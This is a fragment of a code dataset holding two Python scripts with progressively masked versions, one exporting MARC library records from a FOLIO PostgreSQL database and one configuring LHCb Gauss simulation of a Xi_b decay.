logging.error("BAD LEADER" + record.leader + " " + str(row))
record.leader = "{:<24}".format(record.leader)
writer.write(record.as_json())
writer.write('\n')
except Exception as e:
print("ERROR PROCESSING ROW:" + str(row))
print(e)
if rowInstanceId == None:
rowInstanceId = "None" #FOR LOGGING
logging.error("UNABLE TO WRITE TO FILE: " + rowInstanceId)
logging.error(e)
continue
writer.close()
else:
print("in the else --> finishing")
break
if (folio_db):
cursor.close()
marcRecordCursor.close()
folio_db.close()
print("complete")
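#note (added for clarity, not in the original script): each output file holds
#one MARC record per line in MARC-in-JSON form, so the files can be read back
#line by line with the same pymarc JSONReader used above.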
|
normal
|
{
"blob_id": "d81e8478d60c9ee778e1aeb0dd7b05f675e4ecad",
"index": 2306,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nprint('...starting export')\n<mask token>\nlogging.basicConfig(filename=timestr + '-export.log')\n<mask token>\nmatCursor.execute(select_all_mat)\n<mask token>\nfor m in materialTypes:\n materialTypeLookup[m['id']] = m['name']\n<mask token>\nlocCursor.execute(select_all_loc)\n<mask token>\nfor l in locations:\n locLookup[l['id']] = l['name']\n<mask token>\ncallNoTypeCursor.execute(select_all_call_no_types)\n<mask token>\nfor c in callNoTypes:\n callNoTypeLookup[c['id']] = c['name']\n<mask token>\nprint('executing query')\ncursor.execute(select_ids_sql)\nwhile True:\n print('in the while true - fetching...')\n rows = cursor.fetchmany(cursor.itersize)\n print('fetch is done')\n marcRecordCursor = folio_db.cursor(cursor_factory=psycopg2.extras.\n DictCursor)\n if rows:\n save_file = timestr + '.' + str(count) + '.json'\n writer = open(save_file, 'wt')\n print('created the file: ' + save_file)\n count += 1\n for row in rows:\n try:\n rowId = row['id']\n rowInstanceId = row['instance_id']\n if rowInstanceId == None:\n logging.error('BAD RECORD: INSTANCE ID WAS NULL' + str(row)\n )\n continue\n select_record_sql = (\n \"\"\"\n\t\t\t\tselect id, \n\t\t\t\tcontent as marc\n\t\t\t\tfrom {}_mod_source_record_storage.marc_records_lb where \n\t\t\t\tid = '{}' limit 1\"\"\"\n .format(TENANT, rowId))\n marcRecordCursor.execute(select_record_sql)\n marcRow = marcRecordCursor.fetchone()\n marcJsonAsString = json.dumps(marcRow['marc'])\n marcString = marcJsonAsString.encode('utf-8').strip()\n for record in JSONReader(marcJsonAsString):\n if record['6xx'] is not None:\n logging.error('BAD RECORD: 6xx' + str(row))\n continue\n if record['4xx'] is not None:\n logging.error('BAD RECORD: 4xx' + str(row))\n continue\n select_holding_sql = (\n \"\"\"\n\t\t\t\t\tselect id, creation_date, callnumbertypeid, \n\t\t\t\t\tjsonb->>'permanentLocationId' as permanentlocationid, \n\t\t\t\t\tjsonb->'holdingsStatements' as holdingstatements,\n\t\t\t\t\tjsonb->>'callNumber' as callNumber from \n\t\t\t\t\t{}_mod_inventory_storage.holdings_record \n\t\t\t\t\twhere instanceid = '{}' and (jsonb->>'discoverySuppress'='false' or jsonb->>'discoverySuppress' is null)\"\"\"\n .format(TENANT, rowInstanceId))\n marcRecordCursor.execute(select_holding_sql)\n holdingRows = marcRecordCursor.fetchall()\n for holding in holdingRows:\n holdingsStatements = holding['holdingstatements']\n rowHoldingsId = holding['id']\n newField = Field(tag='998', indicators=[' ', ' '],\n subfields=['a', holding.get('callnumber', ''),\n 'l', locLookup.get(holding.get(\n 'permanentlocationid', ''), '')])\n for statement in holdingsStatements:\n if statement is not None:\n newField.add_subfield('s', statement.get(\n 'statement', '').replace(\n 'Extent of ownership:', ''))\n record.add_field(newField)\n select_item_sql = (\n \"\"\"\n\t\t\t\t\t\tselect id, materialtypeid, \n\t\t\t\t\t\tjsonb->>'effectiveLocationId' as effectivelocationid, \n\t\t\t\t\t\tjsonb->>'barcode' as barcode, \n\t\t\t\t\t\tjsonb->'effectiveCallNumberComponents'->>'prefix' as prefix,\n\t\t\t\t\t\tjsonb->'effectiveCallNumberComponents'->>'typeId' as callnotype,\n\t\t\t\t\t\tjsonb->'effectiveCallNumberComponents'->>'callNumber' as callnumber\n\t\t\t\t\t\tfrom {}_mod_inventory_storage.item where \n\t\t\t\t\t\tholdingsrecordid = '{}' and (jsonb->>'discoverySuppress'='false' or jsonb->>'discoverySuppress' is null)\"\"\"\n .format(TENANT, rowHoldingsId))\n marcRecordCursor.execute(select_item_sql)\n itemRows = marcRecordCursor.fetchall()\n for item in itemRows:\n callNoToUse 
= item.get('callnumber', 'na')\n prefix = item.get('prefix', None)\n if prefix is not None:\n callNoToUse = prefix + ' ' + callNoToUse\n record.add_field(Field(tag='952', indicators=[\n ' ', ' '], subfields=['m', item.get(\n 'barcode', ''), 'j', callNoTypeLookup.get(\n item.get('callnotype', ''), ''), 'd',\n locLookup.get(item.get(\n 'effectivelocationid'), ''), 'i',\n materialTypeLookup.get(item.get(\n 'materialtypeid'), ''), 'e', callNoToUse]))\n if len(record.leader) < 24:\n logging.error('BAD LEADER' + record.leader +\n ' ' + str(row))\n record.leader = '{:<24}'.format(record.leader)\n writer.write(record.as_json())\n writer.write('\\n')\n except Exception as e:\n print('ERROR PROCESSING ROW:' + str(row))\n print(e)\n if rowInstanceId == None:\n rowInstanceId = 'None'\n logging.error('UNABLE TO WRITE TO FILE: ' + rowInstanceId)\n logging.error(e)\n continue\n writer.close()\n else:\n print('in the else --> finishing')\n break\nif folio_db:\n cursor.close()\n marcRecordCursor.close()\n folio_db.close()\n print('complete')\n",
"step-3": "<mask token>\nprint('...starting export')\ntimestr = time.strftime('%Y%m%d-%H%M%S')\nlogging.basicConfig(filename=timestr + '-export.log')\nDATABASE_HOST = 'redacted'\nDATABASE_USERNAME = 'redacted'\nDATABASE_PASSWORD = 'redacted'\nDATABASE_PORT = 5432\nDATABASE_NAME = 'redacted'\nTENANT = 'redacted'\ncount = 0\nfolio_db = psycopg2.connect(user=DATABASE_USERNAME, password=\n DATABASE_PASSWORD, host=DATABASE_HOST, port=DATABASE_PORT, database=\n DATABASE_NAME)\nmaterialTypeLookup = {}\nmatCursor = folio_db.cursor(cursor_factory=psycopg2.extras.DictCursor)\nselect_all_mat = (\n \"\"\"\nselect id, jsonb->>'name' as name from {}_mod_inventory_storage.material_type\"\"\"\n .format(TENANT))\nmatCursor.execute(select_all_mat)\nmaterialTypes = matCursor.fetchall()\nfor m in materialTypes:\n materialTypeLookup[m['id']] = m['name']\nlocLookup = {}\nlocCursor = folio_db.cursor(cursor_factory=psycopg2.extras.DictCursor)\nselect_all_loc = (\n \"\"\"\nselect id, jsonb->>'name' as name from {}_mod_inventory_storage.location\"\"\"\n .format(TENANT))\nlocCursor.execute(select_all_loc)\nlocations = locCursor.fetchall()\nfor l in locations:\n locLookup[l['id']] = l['name']\ncallNoTypeLookup = {}\ncallNoTypeCursor = folio_db.cursor(cursor_factory=psycopg2.extras.DictCursor)\nselect_all_call_no_types = (\n \"\"\"\nselect id, jsonb->>'name' as name from {}_mod_inventory_storage.call_number_type\"\"\"\n .format(TENANT))\ncallNoTypeCursor.execute(select_all_call_no_types)\ncallNoTypes = callNoTypeCursor.fetchall()\nfor c in callNoTypes:\n callNoTypeLookup[c['id']] = c['name']\ncursor = folio_db.cursor(name='folio', cursor_factory=psycopg2.extras.\n DictCursor)\ncursor.itersize = 300000\nselect_ids_sql = (\n \"\"\"\nselect\nid, \ninstance_id \nfrom {}_mod_source_record_storage.records_lb where state = {} and (suppress_discovery = False or suppress_discovery is null)\"\"\"\n .format(TENANT, \"'ACTUAL'\"))\nprint('executing query')\ncursor.execute(select_ids_sql)\nwhile True:\n print('in the while true - fetching...')\n rows = cursor.fetchmany(cursor.itersize)\n print('fetch is done')\n marcRecordCursor = folio_db.cursor(cursor_factory=psycopg2.extras.\n DictCursor)\n if rows:\n save_file = timestr + '.' 
+ str(count) + '.json'\n writer = open(save_file, 'wt')\n print('created the file: ' + save_file)\n count += 1\n for row in rows:\n try:\n rowId = row['id']\n rowInstanceId = row['instance_id']\n if rowInstanceId == None:\n logging.error('BAD RECORD: INSTANCE ID WAS NULL' + str(row)\n )\n continue\n select_record_sql = (\n \"\"\"\n\t\t\t\tselect id, \n\t\t\t\tcontent as marc\n\t\t\t\tfrom {}_mod_source_record_storage.marc_records_lb where \n\t\t\t\tid = '{}' limit 1\"\"\"\n .format(TENANT, rowId))\n marcRecordCursor.execute(select_record_sql)\n marcRow = marcRecordCursor.fetchone()\n marcJsonAsString = json.dumps(marcRow['marc'])\n marcString = marcJsonAsString.encode('utf-8').strip()\n for record in JSONReader(marcJsonAsString):\n if record['6xx'] is not None:\n logging.error('BAD RECORD: 6xx' + str(row))\n continue\n if record['4xx'] is not None:\n logging.error('BAD RECORD: 4xx' + str(row))\n continue\n select_holding_sql = (\n \"\"\"\n\t\t\t\t\tselect id, creation_date, callnumbertypeid, \n\t\t\t\t\tjsonb->>'permanentLocationId' as permanentlocationid, \n\t\t\t\t\tjsonb->'holdingsStatements' as holdingstatements,\n\t\t\t\t\tjsonb->>'callNumber' as callNumber from \n\t\t\t\t\t{}_mod_inventory_storage.holdings_record \n\t\t\t\t\twhere instanceid = '{}' and (jsonb->>'discoverySuppress'='false' or jsonb->>'discoverySuppress' is null)\"\"\"\n .format(TENANT, rowInstanceId))\n marcRecordCursor.execute(select_holding_sql)\n holdingRows = marcRecordCursor.fetchall()\n for holding in holdingRows:\n holdingsStatements = holding['holdingstatements']\n rowHoldingsId = holding['id']\n newField = Field(tag='998', indicators=[' ', ' '],\n subfields=['a', holding.get('callnumber', ''),\n 'l', locLookup.get(holding.get(\n 'permanentlocationid', ''), '')])\n for statement in holdingsStatements:\n if statement is not None:\n newField.add_subfield('s', statement.get(\n 'statement', '').replace(\n 'Extent of ownership:', ''))\n record.add_field(newField)\n select_item_sql = (\n \"\"\"\n\t\t\t\t\t\tselect id, materialtypeid, \n\t\t\t\t\t\tjsonb->>'effectiveLocationId' as effectivelocationid, \n\t\t\t\t\t\tjsonb->>'barcode' as barcode, \n\t\t\t\t\t\tjsonb->'effectiveCallNumberComponents'->>'prefix' as prefix,\n\t\t\t\t\t\tjsonb->'effectiveCallNumberComponents'->>'typeId' as callnotype,\n\t\t\t\t\t\tjsonb->'effectiveCallNumberComponents'->>'callNumber' as callnumber\n\t\t\t\t\t\tfrom {}_mod_inventory_storage.item where \n\t\t\t\t\t\tholdingsrecordid = '{}' and (jsonb->>'discoverySuppress'='false' or jsonb->>'discoverySuppress' is null)\"\"\"\n .format(TENANT, rowHoldingsId))\n marcRecordCursor.execute(select_item_sql)\n itemRows = marcRecordCursor.fetchall()\n for item in itemRows:\n callNoToUse = item.get('callnumber', 'na')\n prefix = item.get('prefix', None)\n if prefix is not None:\n callNoToUse = prefix + ' ' + callNoToUse\n record.add_field(Field(tag='952', indicators=[\n ' ', ' '], subfields=['m', item.get(\n 'barcode', ''), 'j', callNoTypeLookup.get(\n item.get('callnotype', ''), ''), 'd',\n locLookup.get(item.get(\n 'effectivelocationid'), ''), 'i',\n materialTypeLookup.get(item.get(\n 'materialtypeid'), ''), 'e', callNoToUse]))\n if len(record.leader) < 24:\n logging.error('BAD LEADER' + record.leader +\n ' ' + str(row))\n record.leader = '{:<24}'.format(record.leader)\n writer.write(record.as_json())\n writer.write('\\n')\n except Exception as e:\n print('ERROR PROCESSING ROW:' + str(row))\n print(e)\n if rowInstanceId == None:\n rowInstanceId = 'None'\n logging.error('UNABLE TO WRITE TO FILE: ' + 
rowInstanceId)\n logging.error(e)\n continue\n writer.close()\n else:\n print('in the else --> finishing')\n break\nif folio_db:\n cursor.close()\n marcRecordCursor.close()\n folio_db.close()\n print('complete')\n",
"step-4": "import pymarc\nfrom pymarc import JSONReader, Field, JSONWriter, XMLWriter\nimport psycopg2\nimport psycopg2.extras\nimport time\nimport logging\nimport json\nprint('...starting export')\ntimestr = time.strftime('%Y%m%d-%H%M%S')\nlogging.basicConfig(filename=timestr + '-export.log')\nDATABASE_HOST = 'redacted'\nDATABASE_USERNAME = 'redacted'\nDATABASE_PASSWORD = 'redacted'\nDATABASE_PORT = 5432\nDATABASE_NAME = 'redacted'\nTENANT = 'redacted'\ncount = 0\nfolio_db = psycopg2.connect(user=DATABASE_USERNAME, password=\n DATABASE_PASSWORD, host=DATABASE_HOST, port=DATABASE_PORT, database=\n DATABASE_NAME)\nmaterialTypeLookup = {}\nmatCursor = folio_db.cursor(cursor_factory=psycopg2.extras.DictCursor)\nselect_all_mat = (\n \"\"\"\nselect id, jsonb->>'name' as name from {}_mod_inventory_storage.material_type\"\"\"\n .format(TENANT))\nmatCursor.execute(select_all_mat)\nmaterialTypes = matCursor.fetchall()\nfor m in materialTypes:\n materialTypeLookup[m['id']] = m['name']\nlocLookup = {}\nlocCursor = folio_db.cursor(cursor_factory=psycopg2.extras.DictCursor)\nselect_all_loc = (\n \"\"\"\nselect id, jsonb->>'name' as name from {}_mod_inventory_storage.location\"\"\"\n .format(TENANT))\nlocCursor.execute(select_all_loc)\nlocations = locCursor.fetchall()\nfor l in locations:\n locLookup[l['id']] = l['name']\ncallNoTypeLookup = {}\ncallNoTypeCursor = folio_db.cursor(cursor_factory=psycopg2.extras.DictCursor)\nselect_all_call_no_types = (\n \"\"\"\nselect id, jsonb->>'name' as name from {}_mod_inventory_storage.call_number_type\"\"\"\n .format(TENANT))\ncallNoTypeCursor.execute(select_all_call_no_types)\ncallNoTypes = callNoTypeCursor.fetchall()\nfor c in callNoTypes:\n callNoTypeLookup[c['id']] = c['name']\ncursor = folio_db.cursor(name='folio', cursor_factory=psycopg2.extras.\n DictCursor)\ncursor.itersize = 300000\nselect_ids_sql = (\n \"\"\"\nselect\nid, \ninstance_id \nfrom {}_mod_source_record_storage.records_lb where state = {} and (suppress_discovery = False or suppress_discovery is null)\"\"\"\n .format(TENANT, \"'ACTUAL'\"))\nprint('executing query')\ncursor.execute(select_ids_sql)\nwhile True:\n print('in the while true - fetching...')\n rows = cursor.fetchmany(cursor.itersize)\n print('fetch is done')\n marcRecordCursor = folio_db.cursor(cursor_factory=psycopg2.extras.\n DictCursor)\n if rows:\n save_file = timestr + '.' 
+ str(count) + '.json'\n writer = open(save_file, 'wt')\n print('created the file: ' + save_file)\n count += 1\n for row in rows:\n try:\n rowId = row['id']\n rowInstanceId = row['instance_id']\n if rowInstanceId == None:\n logging.error('BAD RECORD: INSTANCE ID WAS NULL' + str(row)\n )\n continue\n select_record_sql = (\n \"\"\"\n\t\t\t\tselect id, \n\t\t\t\tcontent as marc\n\t\t\t\tfrom {}_mod_source_record_storage.marc_records_lb where \n\t\t\t\tid = '{}' limit 1\"\"\"\n .format(TENANT, rowId))\n marcRecordCursor.execute(select_record_sql)\n marcRow = marcRecordCursor.fetchone()\n marcJsonAsString = json.dumps(marcRow['marc'])\n marcString = marcJsonAsString.encode('utf-8').strip()\n for record in JSONReader(marcJsonAsString):\n if record['6xx'] is not None:\n logging.error('BAD RECORD: 6xx' + str(row))\n continue\n if record['4xx'] is not None:\n logging.error('BAD RECORD: 4xx' + str(row))\n continue\n select_holding_sql = (\n \"\"\"\n\t\t\t\t\tselect id, creation_date, callnumbertypeid, \n\t\t\t\t\tjsonb->>'permanentLocationId' as permanentlocationid, \n\t\t\t\t\tjsonb->'holdingsStatements' as holdingstatements,\n\t\t\t\t\tjsonb->>'callNumber' as callNumber from \n\t\t\t\t\t{}_mod_inventory_storage.holdings_record \n\t\t\t\t\twhere instanceid = '{}' and (jsonb->>'discoverySuppress'='false' or jsonb->>'discoverySuppress' is null)\"\"\"\n .format(TENANT, rowInstanceId))\n marcRecordCursor.execute(select_holding_sql)\n holdingRows = marcRecordCursor.fetchall()\n for holding in holdingRows:\n holdingsStatements = holding['holdingstatements']\n rowHoldingsId = holding['id']\n newField = Field(tag='998', indicators=[' ', ' '],\n subfields=['a', holding.get('callnumber', ''),\n 'l', locLookup.get(holding.get(\n 'permanentlocationid', ''), '')])\n for statement in holdingsStatements:\n if statement is not None:\n newField.add_subfield('s', statement.get(\n 'statement', '').replace(\n 'Extent of ownership:', ''))\n record.add_field(newField)\n select_item_sql = (\n \"\"\"\n\t\t\t\t\t\tselect id, materialtypeid, \n\t\t\t\t\t\tjsonb->>'effectiveLocationId' as effectivelocationid, \n\t\t\t\t\t\tjsonb->>'barcode' as barcode, \n\t\t\t\t\t\tjsonb->'effectiveCallNumberComponents'->>'prefix' as prefix,\n\t\t\t\t\t\tjsonb->'effectiveCallNumberComponents'->>'typeId' as callnotype,\n\t\t\t\t\t\tjsonb->'effectiveCallNumberComponents'->>'callNumber' as callnumber\n\t\t\t\t\t\tfrom {}_mod_inventory_storage.item where \n\t\t\t\t\t\tholdingsrecordid = '{}' and (jsonb->>'discoverySuppress'='false' or jsonb->>'discoverySuppress' is null)\"\"\"\n .format(TENANT, rowHoldingsId))\n marcRecordCursor.execute(select_item_sql)\n itemRows = marcRecordCursor.fetchall()\n for item in itemRows:\n callNoToUse = item.get('callnumber', 'na')\n prefix = item.get('prefix', None)\n if prefix is not None:\n callNoToUse = prefix + ' ' + callNoToUse\n record.add_field(Field(tag='952', indicators=[\n ' ', ' '], subfields=['m', item.get(\n 'barcode', ''), 'j', callNoTypeLookup.get(\n item.get('callnotype', ''), ''), 'd',\n locLookup.get(item.get(\n 'effectivelocationid'), ''), 'i',\n materialTypeLookup.get(item.get(\n 'materialtypeid'), ''), 'e', callNoToUse]))\n if len(record.leader) < 24:\n logging.error('BAD LEADER' + record.leader +\n ' ' + str(row))\n record.leader = '{:<24}'.format(record.leader)\n writer.write(record.as_json())\n writer.write('\\n')\n except Exception as e:\n print('ERROR PROCESSING ROW:' + str(row))\n print(e)\n if rowInstanceId == None:\n rowInstanceId = 'None'\n logging.error('UNABLE TO WRITE TO FILE: ' + 
rowInstanceId)\n logging.error(e)\n continue\n writer.close()\n else:\n print('in the else --> finishing')\n break\nif folio_db:\n cursor.close()\n marcRecordCursor.close()\n folio_db.close()\n print('complete')\n",
"step-5": "import pymarc\nfrom pymarc import JSONReader, Field, JSONWriter, XMLWriter\nimport psycopg2\nimport psycopg2.extras\nimport time\nimport logging\nimport json\n\n#WRITTEN W/PYTHON 3.7.3\n\n\nprint(\"...starting export\");\n\n# constructing file and log name\ntimestr = time.strftime(\"%Y%m%d-%H%M%S\")\nlogging.basicConfig(filename=timestr + \"-export.log\")\n\n#LOCAL DB\nDATABASE_HOST = \"redacted\"\nDATABASE_USERNAME = \"redacted\"\nDATABASE_PASSWORD = \"redacted\"\nDATABASE_PORT = 5432\nDATABASE_NAME = \"redacted\"\nTENANT = \"redacted\"\n\ncount = 0\nfolio_db = psycopg2.connect(\n\tuser=DATABASE_USERNAME,\n\tpassword=DATABASE_PASSWORD,\n\thost=DATABASE_HOST,\n\tport=DATABASE_PORT,\n\tdatabase=DATABASE_NAME\n)\n\n#init a list of material types\nmaterialTypeLookup = {}\nmatCursor = folio_db.cursor(cursor_factory=psycopg2.extras.DictCursor)\nselect_all_mat = '''\nselect id, jsonb->>'name' as name from {}_mod_inventory_storage.material_type'''.format(TENANT)\nmatCursor.execute(select_all_mat)\nmaterialTypes = matCursor.fetchall()\nfor m in materialTypes:\n materialTypeLookup[m['id']] = m['name']\n\n#init a list of locations \nlocLookup = {}\nlocCursor = folio_db.cursor(cursor_factory=psycopg2.extras.DictCursor)\nselect_all_loc = '''\nselect id, jsonb->>'name' as name from {}_mod_inventory_storage.location'''.format(TENANT)\nlocCursor.execute(select_all_loc)\nlocations = locCursor.fetchall()\nfor l in locations:\n locLookup[l['id']] = l['name']\n\n#init a list of call number types\ncallNoTypeLookup = {}\ncallNoTypeCursor = folio_db.cursor(cursor_factory=psycopg2.extras.DictCursor)\nselect_all_call_no_types = '''\nselect id, jsonb->>'name' as name from {}_mod_inventory_storage.call_number_type'''.format(TENANT)\ncallNoTypeCursor.execute(select_all_call_no_types)\ncallNoTypes = callNoTypeCursor.fetchall()\nfor c in callNoTypes:\n callNoTypeLookup[c['id']] = c['name']\n\ncursor = folio_db.cursor(name='folio',cursor_factory=psycopg2.extras.DictCursor)\n#THIS COULD BE MODIFIED TO RETREIVE X NUMBER OF RECORDS PER FILE\ncursor.itersize=300000\n#from {}_mod_marc_storage.marc_record'''.format(TENANT)\nselect_ids_sql = '''\nselect\nid, \ninstance_id \nfrom {}_mod_source_record_storage.records_lb where state = {} and (suppress_discovery = False or suppress_discovery is null)'''.format(TENANT,\"'ACTUAL'\")\nprint(\"executing query\")\ncursor.execute(select_ids_sql)\nwhile True:\n\tprint(\"in the while true - fetching...\")\n\trows = cursor.fetchmany(cursor.itersize)\n\tprint(\"fetch is done\")\n\tmarcRecordCursor = folio_db.cursor(cursor_factory=psycopg2.extras.DictCursor)\n\tif rows:\n\t\tsave_file = timestr + \".\" + str(count) + \".json\"\n\t\twriter = open(save_file,'wt')\n\t\tprint(\"created the file: \" + save_file)\n\t\tcount += 1\n\t\tfor row in rows:\n\t\t\ttry: \n\t\t\t\trowId = row['id'];\n\t\t\t\trowInstanceId = row['instance_id'];\n\t\t\t\tif rowInstanceId == None:\n\t\t\t\t\t\tlogging.error(\"BAD RECORD: INSTANCE ID WAS NULL\" + str(row))\n\t\t\t\t\t\tcontinue\n\t\t\t\tselect_record_sql = '''\n\t\t\t\tselect id, \n\t\t\t\tcontent as marc\n\t\t\t\tfrom {}_mod_source_record_storage.marc_records_lb where \n\t\t\t\tid = '{}' limit 1'''.format(TENANT, rowId)\n\t\t\t\t#print(select_record_sql)\n\t\t\t\tmarcRecordCursor.execute(select_record_sql)\n\t\t\t\tmarcRow = marcRecordCursor.fetchone()\n\t\t\t\tmarcJsonAsString = json.dumps(marcRow['marc'])\n\t\t\t\tmarcString = marcJsonAsString.encode('utf-8').strip()\n\t\t\t\t#print(marcJsonAsString);\n\t\t\t\tfor record in 
JSONReader(marcJsonAsString):\n\t\t\t\t\t#write MARC JSON to output file\n\t\t\t\t\t#ADD A 998 FOR EACH HOLDING RECORD\n\t\t\t\t\tif record['6xx'] is not None:\n\t\t\t\t\t\tlogging.error(\"BAD RECORD: 6xx\" + str(row))\n\t\t\t\t\t\tcontinue\n\t\t\t\t\tif record['4xx'] is not None:\n\t\t\t\t\t\tlogging.error(\"BAD RECORD: 4xx\" + str(row))\n\t\t\t\t\t\tcontinue\n\t\t\t\t\tselect_holding_sql = '''\n\t\t\t\t\tselect id, creation_date, callnumbertypeid, \n\t\t\t\t\tjsonb->>'permanentLocationId' as permanentlocationid, \n\t\t\t\t\tjsonb->'holdingsStatements' as holdingstatements,\n\t\t\t\t\tjsonb->>'callNumber' as callNumber from \n\t\t\t\t\t{}_mod_inventory_storage.holdings_record \n\t\t\t\t\twhere instanceid = '{}' and (jsonb->>'discoverySuppress'='false' or jsonb->>'discoverySuppress' is null)'''.format(TENANT,rowInstanceId)\n\t\t\t\t\t#print(select_holding_sql)\n\t\t\t\t\tmarcRecordCursor.execute(select_holding_sql)\n\t\t\t\t\tholdingRows = marcRecordCursor.fetchall()\n\t\t\t\t\tfor holding in holdingRows:\n\t\t\t\t\t\t#print(holding['callnumber'])\n\t\t\t\t\t\tholdingsStatements = holding['holdingstatements']\n\t\t\t\t\t\trowHoldingsId = holding['id']\n\t\t\t\t\t\tnewField = Field(tag = '998',\n\t\t\t\t\t\t\t\t indicators = [' ',' '],\n\t\t\t\t\t\t\t\t subfields = ['a',holding.get('callnumber',''),\n\t\t\t\t\t\t\t\t\t\t\t'l',locLookup.get(holding.get('permanentlocationid',''),'')])\n\t\t\t\t\t\tfor statement in holdingsStatements:\n\t\t\t\t\t\t\tif statement is not None:\n\t\t\t\t\t\t\t\tnewField.add_subfield('s',statement.get('statement','').replace('Extent of ownership:',''));\n\t\t\t\t\t\trecord.add_field(newField)\n\t\t\t\t\t\t#ADD AN 952 FOR EACH ITEM\n\t\t\t\t\t\tselect_item_sql = '''\n\t\t\t\t\t\tselect id, materialtypeid, \n\t\t\t\t\t\tjsonb->>'effectiveLocationId' as effectivelocationid, \n\t\t\t\t\t\tjsonb->>'barcode' as barcode, \n\t\t\t\t\t\tjsonb->'effectiveCallNumberComponents'->>'prefix' as prefix,\n\t\t\t\t\t\tjsonb->'effectiveCallNumberComponents'->>'typeId' as callnotype,\n\t\t\t\t\t\tjsonb->'effectiveCallNumberComponents'->>'callNumber' as callnumber\n\t\t\t\t\t\tfrom {}_mod_inventory_storage.item where \n\t\t\t\t\t\tholdingsrecordid = '{}' and (jsonb->>'discoverySuppress'='false' or jsonb->>'discoverySuppress' is null)'''.format(TENANT,rowHoldingsId)\n\t\t\t\t\t\t#print(select_item_sql)\n\t\t\t\t\t\tmarcRecordCursor.execute(select_item_sql)\n\t\t\t\t\t\titemRows = marcRecordCursor.fetchall()\n\t\t\t\t\t\tfor item in itemRows:\n\t\t\t\t\t\t\tcallNoToUse = item.get('callnumber','na')\n\t\t\t\t\t\t\t#print(callNoToUse)\n\t\t\t\t\t\t\tprefix = item.get('prefix',None)\n\t\t\t\t\t\t\tif (prefix is not None):\n\t\t\t\t\t\t\t\tcallNoToUse = prefix + \" \" + callNoToUse\n\t\t\t\t\t\t\trecord.add_field(\n\t\t\t\t\t\t\t\tField(tag = '952',\n\t\t\t\t\t\t\t\t\tindicators = [' ',' '],\n\t\t\t\t\t\t\t\t\tsubfields = ['m',item.get('barcode',''),\n\t\t\t\t\t\t\t\t\t'j',callNoTypeLookup.get(item.get('callnotype',''),''),\n\t\t\t\t\t\t\t\t\t'd',locLookup.get(item.get('effectivelocationid'),''),\n\t\t\t\t\t\t\t\t\t'i',materialTypeLookup.get(item.get('materialtypeid'),''),\n\t\t\t\t\t\t\t\t\t'e',callNoToUse]))\n\t\t\t\t\t\t\tif (len(record.leader) < 24):\n\t\t\t\t\t\t\t\tlogging.error(\"BAD LEADER\" + record.leader + \" \" + str(row))\n\t\t\t\t\t\t\t\trecord.leader = \"{:<24}\".format(record.leader)\n\t\t\t\t\twriter.write(record.as_json())\n\t\t\t\t\twriter.write('\\n')\n\t\t\texcept Exception as e:\n\t\t\t\t\tprint(\"ERROR PROCESSING ROW:\" + str(row))\n\t\t\t\t\tprint(e)\n\t\t\t\t\tif 
rowInstanceId == None:\n\t\t\t\t\t\trowInstanceId = \"None\" #FOR LOGGING\n\t\t\t\t\tlogging.error(\"UNABLE TO WRITE TO FILE: \" + rowInstanceId)\n\t\t\t\t\tlogging.error(e)\n\t\t\t\t\tcontinue\n\t\twriter.close()\n\telse:\n\t\tprint(\"in the else --> finishing\")\n\t\tbreak\n\nif (folio_db):\n\tcursor.close()\n\tmarcRecordCursor.close()\n\tfolio_db.close()\n\tprint(\"complete\")\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
# file /home/hep/ss4314/cmtuser/Gauss_v45r10p1/Gen/DecFiles/options/16303437.py generated: Wed, 25 Jan 2017 15:25:22
#
# Event Type: 16303437
#
# ASCII decay Descriptor: [Xi_b- -> (rho- -> pi- pi0) K- p+]cc
#
from Configurables import Generation
Generation().EventType = 16303437
Generation().SampleGenerationTool = "SignalRepeatedHadronization"
from Configurables import SignalRepeatedHadronization
Generation().addTool( SignalRepeatedHadronization )
Generation().SignalRepeatedHadronization.ProductionTool = "PythiaProduction"
from Configurables import ToolSvc
from Configurables import EvtGenDecay
ToolSvc().addTool( EvtGenDecay )
ToolSvc().EvtGenDecay.UserDecayFile = "$DECFILESROOT/dkfiles/Omegab_rho-h-p+,pi-pi0_PPChange=phsp,DecProdCut.dec"
Generation().SignalRepeatedHadronization.CutTool = "DaughtersInLHCb"
Generation().SignalRepeatedHadronization.SignalPIDList = [ 5132,-5132 ]
from Configurables import LHCb__ParticlePropertySvc
LHCb__ParticlePropertySvc().Particles = [ "Xi_b- 122 5132 -1.0 6.048 1.13e-012 Xi_b- 5132 0.000000e+000", "Xi_b~+ 123 -5132 1.0 6.071 1.1e-012 anti-Xi_b+ -5132 0.000000e+000" ]
|
normal
|
{
"blob_id": "7cc9d445d712d485eaebd090d2485dac0c38b3fb",
"index": 5918,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nGeneration().addTool(SignalRepeatedHadronization)\n<mask token>\nToolSvc().addTool(EvtGenDecay)\n<mask token>\n",
"step-3": "<mask token>\nGeneration().EventType = 16303437\nGeneration().SampleGenerationTool = 'SignalRepeatedHadronization'\n<mask token>\nGeneration().addTool(SignalRepeatedHadronization)\nGeneration().SignalRepeatedHadronization.ProductionTool = 'PythiaProduction'\n<mask token>\nToolSvc().addTool(EvtGenDecay)\nToolSvc().EvtGenDecay.UserDecayFile = (\n '$DECFILESROOT/dkfiles/Omegab_rho-h-p+,pi-pi0_PPChange=phsp,DecProdCut.dec'\n )\nGeneration().SignalRepeatedHadronization.CutTool = 'DaughtersInLHCb'\nGeneration().SignalRepeatedHadronization.SignalPIDList = [5132, -5132]\n<mask token>\nLHCb__ParticlePropertySvc().Particles = [\n 'Xi_b- 122 5132 -1.0 6.048 1.13e-012 Xi_b- 5132 0.000000e+000',\n 'Xi_b~+ 123 -5132 1.0 6.071 1.1e-012 anti-Xi_b+ -5132 0.000000e+000']\n",
